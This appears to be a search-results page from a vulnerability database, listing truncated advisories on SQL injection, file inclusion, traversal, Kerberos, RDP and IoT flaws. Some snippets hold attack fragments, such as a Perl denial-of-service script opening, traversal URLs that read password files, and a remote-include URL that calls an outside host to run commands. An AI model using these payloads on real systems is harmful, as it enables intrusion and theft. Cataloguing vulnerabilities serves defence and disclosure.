56796 matches found
TPshop 后台代码执行漏洞
0x01 说明 TPshop开源商城系统 Thinkphp shop的简称 ,是深圳搜豹网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Adroid客户端+微商城,系统PC+后台是基于ThinkPHP5 MVC构架开发的跨平台开源软件,设计得非常灵活,具有模块化架构体系和丰富的功能,易于与第三方应用系统无缝集成,在设计上,包含相当全面,以模块化架构体系,让应用组合变得相当灵活,功能也相当丰富。 下载地址:http://www.tp-shop.cn/Index/Index/download.html 目录大概结构 ├─index.p...
ESKIMOROLL-ms14-068 Windows vulnerability in the Key Distribution Center (KDC) service (CVE-2014-6324)
Description MS14-068 is a Windows vulnerability in the Key Distribution Center KDC service. It allows an authenticated user to insert an arbitrary PAC a structure that represent all user rights in its Kerberos ticket the TGT. https://technet.microsoft.com/library/security/ms14-068.aspx In Windows...
OpenBSD http server - denial of service vulnerability(CVE-2017-5850)
No description provided by source. !/usr/bin/perl -w curl --limit-rate 1 --continue-at 1 --header "Host: www.example.com" http://target/10mb.fs use warnings; use IO::Socket; use Parallel::ForkManager; $numforks = 50; if $ARGV \n"; sub killhttpd print "ATTACKING $ARGV0 using $numforks forks\n"; $p...
WordPress 利用 XMLRPC 爆破
Author: RickGray 知道创宇404安全实验室 Date: 2015-10-09 xmlrpc 是 WordPress 中进行远程调用的接口,而使用 xmlrpc 调用接口进行账号爆破在很早之前就被提出并加以利用。近日 SUCURI 发布文章介绍了如何利用 xmlrpc 调用接口中的 system.multicall 来提高爆破效率,使得成千上万次的帐号密码组合尝试能在一次请求完成,极大的压缩请求次数,在一定程度上能够躲避日志的检测。 原理分析 WordPress 中关于 xmlrpc 服务的定义代码主要位于 wp-includes/class-IXR.php 和...
live800客服系统任意文件下载漏洞
简要描述: 偷闲发个漏洞,许多大厂商在,用危害挺大的。 详细说明: 在live800客服站点上fuzz出一个downlog.jsp文件 这里以 华为 为例: http://robotim.vmall.com/live800/downlog.jsp 根据提示猜测有可能是downlog.jsp没有接收到下载路径,于是继续fuzz参数: downlog.jsp?path=/&file=etc/passwd downlog.jsp?filepath=/&file=etc/passwd downlog.jsp?filepath=/&filename=etc/passwd ……...
ProFTPD TLS会话重协商明文数据注入漏洞
CVE ID: CVE-2009-3555 ProFTPD是一款开放源代码FTP服务程序。 ProFTPD的模块modtls存在OpenSSL的会话可重新协商选项的漏洞,导致攻击者可以在会话数据流中插入明文数据,操纵数据交互。 ProFTPD Project ProFTPD 1.3.x 厂商补丁: ProFTPD Project --------------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.proftpd.org/docs/RELEASENOTES-1.3.2c...
D-LINK DIR-3040 服务组件使用默认密码(CVE-2021-21818)
The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed ...
泛微E-mobile前台sql注入漏洞
...
Hikvision IP Camera Access Bypass
Access control bypass in Hikvision IP Cameras Full disclosure Sep 12, 2017 Synopsis: --------------- Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account. The vulnerability has been present in Hikvision products since at least 2014...
IBOS协同办公系统misc.php SQL注入
No description provided by source...
TRS(ids新老版本)设计缺陷(xxe/用户信息泄露包括密码等)
简要描述: TRSids设计缺陷xxe/用户信息泄露包括密码,好久没有发过漏洞了,突然上来看了看,发现漏洞提交页面都变了 详细说明: 首先我们看看web.xml配置文件: ServiceServlet com.trs.idm.admin.service.ServiceServlet ServiceServlet /service 跟进ServiceServlet protected void serviceHttpServletRequest request, HttpServletResponse response throws ServletException, IOExceptio...
HP-UX <= 10.20 newgrp Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/683/info Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. !/usr/bin/perl use FileHandle; sub h2cs local$stuff=@; local$rv;...
Anymacro 邮件系统最新版SQL注入漏洞
简要描述: 厂商一直回复说,不是最新版的,现在我就捅几枚最新版的菊花出来,谢谢。。。 详细说明: 0x001 anymacro是国内较流行的一家企业级邮箱系统,客户主要为教育/政府机构。 今天所发现的SQL注入影响所有Anymacro所有邮件系统。 0x002 漏洞分析 本次属于黑盒测试。。。 漏洞点在网盘处,在下载里面的附件的时候,由于参数未进行判断,导致产生SQL注入漏洞 https://mail.xxx.com/down.php?netdisk=1...
深澜软件鸡肋漏洞可被getshell
简要描述: 深澜软件鸡肋漏洞造成getshell 详细说明: 有好几个鸡肋漏洞,就造成了getshell。 本例以中枪的陕西科技大学为例。 1.爆路径问题http://xxxx.xx:8080/global.php,所有均存在路径泄露 不过实际路径是/srun3/srun/services/ (1)80端口路径/srun3/web/ (2)8800端口路径/srun3/srun/services/ (3)8080/8081端口路径/srun3/srun/web/ 2.管理后台(8080/8081端口),默认口令 support...
Microsoft Windows远程桌面协议RDP远程代码执行漏洞(MS12-020)
BUGTRAQ ID: 52353 CVE ID: CVE-2012-0002 远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。 Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,然后控制系统。 0 Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server...
CcMail 1.0.1 (update.php functions_dir) Remote File Inclusion Exploit
No description provided by source. !/usr/bin/perl CcMail 1.0 Remote File Inclusion Exploit Download Script http://www.cicoandcico.com/download/ccmail/ccmail1.0.1.tar.gz Bug Found & coded By CrackersChild [email protected] Kullanimi perl cra.pl perl cra.pl http://site.com/...
VMware vCenter Server远程代码执行漏洞(CVE-2021-21985)
Rapid7 May 26, 2021 5:34pm UTC 1 day ago• Last updated May 27, 2021 6:39pm UTC 7 hours ago Technical Analysis Threat status: Impending threat Attacker utility: Network infrastructure compromise Description On Tuesday, May 25, 2021, VMware published security advisory VMSA-2021-0010, which includes...
Major Vulnerabilities in Foscam Cameras
For the past several months, VDOO’s security research teams have been undertaking broad-scale security research of leading IoT products, from the fields of safety and security. In most cases, the research was carried out together with the device vendors for the sake of efficiency and transparency...
Dnsmasq Information Leak(CVE-2017-14494)
Sadly, there are no easy docker setup instructions available. Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client: python /poc.p...
大华网络视频监控设备弱口令漏洞
No description provided by source...
程氏CMS v3.5 app/controllers/dance.php SQL注入漏洞
0x01 漏洞详情 漏洞页面 app/controllers/dance.php public function so $data='';$datacontent=''; $fid = $this-security-xssclean$this-uri-segment3; //方式 $key = $this-security-xssclean$this-input-getpost'key', TRUE; //关键字 $page = intval$this-input-get'p', TRUE; //页数 if$page==0 $page=1;...
MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability
No description provided by source. Bl@ckbe@rD 'Tunisian TerrorisT' ------------------------- $$$$$$$$$$$$$$$$$$$$$$$---------------------------------------- + Script Name : MVC-Web CMS 1.0 and 1.2 Remote SQL Injection Exploit |+| Team : InjEct0r5 + Author : Bl@ckbe@rD 'Tunisian TerrorisT' + Conta...
Apache Tomcat多个远程信息泄露漏洞
BUGTRAQ ID: 25316 CVECAN ID: CVE-2007-3385,CVE-2007-3382 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 Apache Tomcat处理用户请求数据时存在输入验证漏洞,远程攻击者可能利用此漏洞获取会话相关的敏感信息。 Apache Tomcat没有正确的处理Cookie值中的“" ”字符序列,且错误地将Cookie值中的单引号处理为分隔符,在某些情况下,这可能导致泄露敏感信息,如会话ID。 Apache Group Tomcat 6.0.0 - 6.0.13 Apache Group Tomcat 5.5.0...
Exim Use-After-Free(CVE-2017-16943)
On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated, including CVE-2017-16943 for a use-after-free UAF vulnerability, which leads to Remote Code Execution RCE; and CVE-2017-16944 for a Denial-of-Service D...
Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)
Adobe ColdFusion =8.0 http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en server替换成目标网站即可 Update:2017-04-28 This blog was written by Scott White, Senior Principal Security Consultant, Web Application Team Lead – TrustedSec TL;D...
MetaCart2 IntCatalogID Parameter Remote SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13382/info A remote SQL-injection vulnerability affects MetaCart2 because the application fails to properly sanitize user-supplied input before including it in SQL queries. An attacker may exploit this issue to manipulate...
Discuz! x the use of SSRF remote command execution vulnerability
Content source: security think tank 0X01 ready to work jannock issued by Discuz conditional remote command execution,a lot of big stations affected, the online hasn't published details, in a safe public number to see on the jannock simple to say about the principle, is ssrf+redis/memcache issues,...
Shop7z admin/lipinadd.asp越权访问
No description provided by source...
Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability
No description provided by source. Affected Application: Mambo phpShop v1.2 RC2b Mambo CMS Component . . : contact : . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd/Found by: Charles Nelwan a.k.a Cmaster4 Team: BatamHacker irc.dal.net crew URL: http://www.batamhacker.info/forum...
Claymore's Dual Ethereum Miner unauth stack buffer overflow(CVE-2017-16930)
VuNote =================== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16930 Version: 0.2 Date: Nov 30th, 2017 Tag: claymore dual ethereum decred crypto currency miner Overview -------- Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner Vendor: nanopool/claymore...
Ruby on Rails 'implicit render' functionality Directory Traversal Vulnerability (CVE-2014-0130)
Impact ------ The implicit render functionality allows controllers to render a template, even if there is no explicit action with the corresponding name. This module does not perform adequate input sanitization which could allow an attacker to use a specially crafted request to retrieve arbitrary...
Tipask 2.5 /control/question.php SQL注入漏洞
No description provided by source...
Discuz 6.0 /my.php SQL注入漏洞
No description provided by source...
Docmint 1.0/2.1 'id' Parameter Cross Site Scripting Vulnerability
No description provided by source...
Papoo CMS 3.2 IBrowser Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/19807/info Papoo CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious P...
Postfix Admin 'functions.inc.php' SQL注入漏洞
BUGTRAQ ID: 66455 CVECAN ID: CVE-2014-2655 Postfix是Unix类操作系统中所使用的邮件传输代理。 用于程序没有在SQL查询前充分过滤用户提供的数据,允许攻击者危及应用程序,访问或修改数据,或利用底层数据库中潜在的漏洞。 0 Postfix Admin Postfix Admin 2.3.5 Postfix Admin Postfix Admin 2.3.4 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://sourceforge.net/projects/postfixadmin/...
Kentico CMS用户名泄漏漏洞
Kentico CMS是一款内容管理系统。 由于应用程序没有限制访问CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx,可以泄漏有效的用户名。 0 Kentico CMS 7.x Kentico CMS 7.0.78版本以修复此漏洞,建议用户下载使用: http://www.kentico.com/...
EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability
No description provided by source. Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: powered by EQdkp Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...
CartWIZ 1.10 AddToCart.ASP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13330/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. Successful exploitatio...
SDCMS某处设计缺陷导致遍历任意文件内容
简要描述: SDCMS某处设计缺陷导致遍历任意文件内容 详细说明: 1、首先看看缺陷文件: 文件/sdcms/admin/sdtheme.asp ...... 第138行: case "edit" dim filename:filename=sdcms.fget"filename",0 if notsdcms.checkstrfilename,"filename" then sdcms.echo "filename is wrong" sdcms.die end if if notsdcms.isfile"../theme/"&filename then sdcms.echo...
ISC BIND 9 DNSSEC查询响应远程缓存中毒漏洞
BUGTRAQ ID: 37118 CVECAN ID: CVE-2009-4022 BIND是一个应用非常广泛的DNS协议的实现,由ISC负责维护,具体的开发由Nominum公司完成。 启用了DNSSEC验证的名称服务器在解析递归客户端查询期间可能错误的从所接收到响应的附加部分向其缓存添加记录,这是一种缓存中毒的情况。...
Apache Synapse远程命令执行漏洞(CVE-2017-15708)
0X00 介绍 Apache Synapse是一种轻量级的高性能企业服务总线(ESB)。Apache Synapse由快速和异步的中介引擎提供支持,为XML、Web服务和REST提供了卓越的支持。 0X01 分析 我们知道,完成反序列化漏洞需要存在两个条件: 存在反序列化对象数据传输 有缺陷的第三方lib库,例如Apache Commons Collections 在FoxGlove Security安全团队的@breenmachine的博文中,总结了非常全面可能使用反序列化的地方: 在HTTP请求中 RMI,RMI在传输过程中一定会使用序列化和反序列化...
GitLab 任意用户 authentication tokens 泄漏导致远程代码执行漏洞
漏洞分析参考: http://paper.seebug.org/104/ The project export feature serializes the user objects of team members and stores it in the project.json file. This object contains the authenticationtoken for every user, meaning that an attacker can simply go ahead and create a project on GitLab.com, add one...
EuseTMS plancommentlist.aspx type SQL注射
No description provided by source...
wu-ftpd <= 2.6.1 - Remote Root Exploit
No description provided by source. / 7350wurm - x86/linux wuftpd remote root exploit TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be disclosed to third parties,...
Lighttpd 1.4.30 / 1.5 Denial Of Service
No description provided by source. / Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit. Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang Here the vulnerable code...
Microsoft Windows TCP/IP ICMP CVE-2011-1871远程拒绝服务漏洞
Bugtraq ID: 48987 CVE ID:CVE-2011-1871 Microsoft Windows是一款流行的操作系统。 Windows TCP/IP栈不正确处理特制构建的ICMP消息序列,远程攻击者可以利用漏洞发送特制消息使系统停止响应或自动重新启动。 Microsoft Windows Vista x64 Edition SP2 Microsoft Windows Vista SP2 Microsoft Windows Server 2008 R2 x64 SP1 Microsoft Windows Server 2008 R2 x64 0 Microsoft...
VMware Consolidated Backup (VCB)用户密码信息泄漏漏洞
BUGTRAQ ID:30937 CVE ID:CVE-2008-2101 CNCVE ID:CNCVE-20082101 VMware ESX Server是一款企业级虚拟计算机软件。 VMware Consolidated BackupVCB命令行工具存在设计问题,本地攻击者可以利用漏洞获得用户密码信息。 VMware Consolidated BackupVCB命令行工具可通过-p命令接收密码,用户登录到服务控制台可以获得通过VCB命令行运行过程中的用户名和密码信息。 VMWare ESX Server 3.0.3 VMWare ESX Server 3.0.2 VMWare ES...
myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities
No description provided by source. script name : myPHPCalendar Script Downloads : http://freshmeat.net/projects/myphpcalendar/ Web Site : http://myphpcalendar.sourceforge.net/ Version : 10.1 Risk : High Found By : Cr@zyKing Thanks : | eTNR | ApAci | Eno7 | TheHacker | Kormali46 | TheBekir |...
Mambo Gallery Manager MosConfig_Absolute_Path远程文件包含漏洞
Mambo Gallery Manager是一款基于Mambo的图片程序。 Mambo Gallery Manager不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'help.mgm.php'脚本对用户提交的"mosConfigabsolutepath"参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Mambo Mambo Gallery Manager Component 0.95 r3 http://mamboxchange.com/projects/mgm/...